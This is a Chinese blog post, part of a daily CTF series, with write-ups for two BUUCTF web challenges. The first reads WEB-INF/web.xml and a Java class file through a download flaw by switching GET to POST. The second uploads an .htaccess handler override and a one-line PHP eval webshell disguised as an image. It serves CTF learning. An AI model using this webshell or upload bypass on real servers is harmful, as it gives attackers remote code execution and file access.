一天一道ctf 第22天(web.xml)

最新推荐文章于 2023-04-17 16:32:45 发布
最新推荐文章于 2023-04-17 16:32:45 发布
阅读量399 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/115508562
版权

[RoarCTF 2019]Easy Java
查看源码发现有一个help.dox文件,但是读不了
在这里插入图片描述
看了一下网上的wp这道题知识点还是挺多的
首先bp抓包把GET请求改成POST请求就能查看文件了(还是要积累经验),只要改’GET’就行了,别的都不用动
在这里插入图片描述
但help.docx里没有有用的信息,那你给我提示这个文件干嘛???
但是我们知道了可以用这种方式请求文件
http://7f1b9882-442b-4f1f-8b09-c842d6f13b50.node3.buuoj.cn/Download?filename=WEB-INF/web.xml请求下载web.xml文件

 WEB-INF包含以下文件或目录:
    /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
    /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
    /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
    /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
    /WEB-INF/database.properties:数据库配置文件

在这里插入图片描述
可以在里面找到FlagController和它的路径,但其实这里还是比较靠经验和对Java路径的熟悉程度的,最后的文件路径是Download?filename=WEB-INF/classes/com/wm/ctf/FlagController.class,老样子要改成POST
获得FlagController.class文件,将其中的flag base64解码即可
在这里插入图片描述
[GXYCTF2019]BabyUpload
和之前有一道题一样先上传.htaccess文件让.jpeg被当作.php执行,然后上传一句话木马

//.htacsess
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

因为网页设置过滤,只能上传image/jpeg文件,所以bp抓包改文件名成.htaccess,上传成功后回显文件路径

再上传一句话木马,在源码里我们能看到它正则过滤了<?,所以用java来写一句话木马

//1.jpeg
<script language='php'>eval($_POST[cmd]);</script>

上传成功后蚁剑连接回显的地址,从upload开始才是正确的地址http://be900a97-e25e-47d0-b8dd-191aae7f18ba.node3.buuoj.cn/upload/48292674a17b729468ad3b0f28d521b4/1.jpeg
在这里插入图片描述

scrawman
关注
[网络安全自学篇] 八十.WHUCTFWEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 906
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 725
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
CTF--Do you like xml
浅笑996的博客
06-28 341
题目链接:http://47.94.221.39:8008/ 扫描目录得到/.DS_Store文件 下载文件,直接用脚本进行还原操作。https://github.com/lijiejie/ds_store_exp 打开backend文件直接搜索得到flag
CTF之眼见非实
D-R0s1的博客
07-20 4373
                                 CTF中对于xml文件的处理方式        最近几在刷一些平台上的ctf题,遇到了好多文件解压出来以后是xml格式的,觉得就我现阶段能接触的题来说,还是有一点经验可循的,我是一个刚入坑的小白,有误之处还请路过的大牛指正。        首先感谢BugKu这个ctf平台,我要跟大家一起分享的这道题目是BugKu平台的名为眼见...
buuctf 刷题 6(WEB-INF/web.xml&&&&Smarty模板注入&&py脚本编写)
weixin_63231007的博客
05-25 774
[RoarCTF 2019]Easy Java 进去页面,得到一个登录框。因为题目是java,应该不是sql注入, 点开help,看见: filename参数可控 。没做过相应的java安全题目。看其他师傅题解可知,可能存在文件下载漏洞 url 栏里get传入WEB-INF/web.xml。无果,post传入意外发现可以下载文件。 下载存有web信息的XML文件:WEB-INF/web.xml 查看文件内容,文件里内容有: <servlet> &l
CTF中关于XXE(XML外部实体注入)题目两道
生活·代码_这里是青_分享快乐
11-13 1101
题目:UNCTF-Do you like xml? 链接:http://112.74.37.15:8008/ hint:weak password (弱密码) 1、观察后下载图片拖进WINHEX发现提示:flag in flag.php , 进入112.74.37.15:8080/flag.php 发现啥也没有 需要拿下php文件好好看看 2、根据题目hint 尝试登陆 账号密码统...
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3735
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
豌豆杯-CTF
weixin_30919919的博客
10-29 1251
目录 wandoucup-ctf web web1-签到题 web2-输入密码查看flag web3-这真能传马? web4-这真能注入? web5-API web6-sweet home web附加题-at...
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
youngerll的博客
01-02 975
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
看雪CTF web(SSRF+XML+JAR协议)
a3320315的博客
12-01 1633
题外 很久没写文章了,这儿再水一篇 正文 首先打开题目 直接有个提示,给了两个链接 根据测试第一个链接/getimage?url=https://bbs.pediy.com是远程加载图片的,而且对于url有一定的格式要求 那么我们怎么绕过这个正则呢? 这儿就需要用到一个技巧了,这儿是java环境, httpclient3和httpclient4这两个库都有容错机制,即假如端口后面存在其他字符会自动舍弃掉(/作为分隔符) 而且都会对host进行url二次解码,所以我们最终的payload为: http:/
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 627
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
BUUCTF-WEB-INF/web.xml泄露-SSTI注入
m0_64180167的博客
04-17 736
其实和sql注入一样 sql注入是通过构造字符串 让我们要比对的字符串变为执行的命令ssti也是一样的 只不过 ssti是在框架中执行 语言框架对html的渲染 因为对字符串不够严格 就容易变为命令执行是用户和页面交互的函数 页面可以通过用户的操作来展示页面。
ctf】简单说明报错型注入floor()和updataxml原理
chualam的博客
11-02 563
floor rand group by 缺一不可 报错原理 floor(rand(0)*2)x 中floor负责把生成的随机数的小数去掉 但是(0)*2严格来说不算随机数 他的生成形式基本为011 所以能肯定导致报错 如果是rand()*2就会不可控 我是这么理解的:它一共有五次操作 如下: 由011011的这种形式 第一个生成的数字是0 他会检查有没有为0的键名(key) 结果当然是没有(第一次操作) 所以会插入一个虚拟表 但是在插入过程中要再取一次group by 后面的值 即再进行一次运算
一道关于 XML 实体注入的 CTF
YT的博客
04-02 3047
地址:http://web.jarvisoj.com:9882/ 目标:获取目标及其 /home/ctf/flag.txt 中的 flag 值 1. 先通过抓包查看请求包 可以看到,Content-Type 是通过 JSON 来传送的。若将传送的数据格式改为 XML,那么有可能服务器就会解析上传的 XML 脚本来干一些不可描述的事情。 2. 将数据包发送到 Repeater 中进行测试。 3...
xml 前言中不允许有内容_CTFweb类型(二十八)xml、dtd及blind xxe基础讲解
weixin_39936403的博客
11-04 397
点击上方蓝色字体,关注我们接下来的话就开始讲xxe的相关内容,我们先来了解一下xxe的一个基本概念。概念全称是 xml的外部实体注入漏洞,会很明显的感觉到,和xml有非常密切的关系的。所以一开始会先讲xml的一些相关基础知识,然后再讲到一些具体的案例。xxe漏洞,它是发生在一个应用程序去解析xml输入的时候,没有禁止外部实体的加载。所以它的关键点其实是在一个外部实体的作用在这里,或者说很...
XML、XXE注入与CTF下的XXE
sGanYu
10-27 1830
在学习XXE漏洞之前,首先一起学习一下什么是XML XML是什么? 是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本 常见的XML结构如下: <?xml version="1.0" encoding="utf-8"?>#XML声明 <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)>&
BUUCTF WEB TRUE XML COOKBOOK
qq_41696858的博客
05-09 580
由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧 言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入? 经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的 X-Requested-With: XMLHttpRequest 依旧推荐https://xz.aliyun.com/t/6887#toc-5 构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是一个内网题。。。。 一个小经验:由于BUUCTF转用了K8S管理,他的靶机容器是随机在80,81两个网
解析XML文件
ADreamClusive的博客
05-31 385
1 SAX--Simple API for XML1.1 SAX简介SAX是一个解析速度快,并且占用内存少的XML解析器。SAX解析XML文件采用的是事件驱动,也就是它并不需要解析完整个文档,在按内容顺序解析文档的过程中,SAX会判断当前读到字符是否XML语法中的某部分,如果符合则发出事件。所谓的事件其实就是一些回调函数,这些方法定义在ContentHandler接口中,常用的方法有:1.2 使用...
ctf.show_web5
最新发布
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值